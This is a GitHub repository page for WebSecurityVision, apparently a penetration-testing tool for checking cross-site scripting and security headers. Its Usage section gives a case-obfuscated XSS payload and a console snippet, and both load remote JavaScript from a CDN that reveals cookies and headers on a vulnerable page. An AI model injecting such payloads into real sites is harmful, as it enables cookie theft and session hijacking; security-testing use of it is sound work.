Skip to content

WebSecurityVision is a tool for checking XSS vulnerabilities and security headers in web applications, displaying browser information if vulnerabilities are found.

License

Notifications You must be signed in to change notification settings

TheWation/WebSecurityVision

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

WebSecurityVision

made-with-python built-with-love

WebSecurityVision is a powerful tool for checking XSS vulnerabilities during the Pentest process. By calling the tool on a page, it can identify whether the site has an XSS vulnerability, and check to see if the security headers are set correctly. If the site has an XSS vulnerability and the security headers are not set correctly, the tool will display browser information, including cookies and headers related to the cybersecurity space.

BetterCap

This tool is an essential part of the penetration testing toolkit, as it enables security professionals to quickly and easily identify potential vulnerabilities in web applications. By identifying and addressing these vulnerabilities, security professionals can help prevent cyber attacks and protect sensitive data.

Overall, WebSecurityVision is a valuable tool that can help security professionals to identify and mitigate XSS vulnerabilities in web applications. It is easy to use, flexible, and highly effective, making it an essential part of any penetration testing toolkit.

Usage

To use, enter the following code through the vulnerable section or enter the page through the Developer Console section.

Vulnerable Input:

<ScRiPT SRC=https://cdn.jsdelivr.net/gh/TheWation/WebSecurityVision/vision.js></ScRiPT>

Inspect Element:

var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'https://cdn.jsdelivr.net/gh/TheWation/WebSecurityVision/vision.js';
document.head.appendChild(script);

Disclaimer

For educational purposes only. Do not use for illegal activities. Use at your own risk. By using this tool, you agree to comply with all applicable laws and regulations. Unauthorized use is strictly prohibited. Always obtain permission before using this tool. No warranties.

License

WebSecurityVision is made with ♥ by Wation and it's released under the MIT license.

About

WebSecurityVision is a tool for checking XSS vulnerabilities and security headers in web applications, displaying browser information if vulnerabilities are found.

Topics

Resources

License

Code of conduct

Stars

Watchers

Forks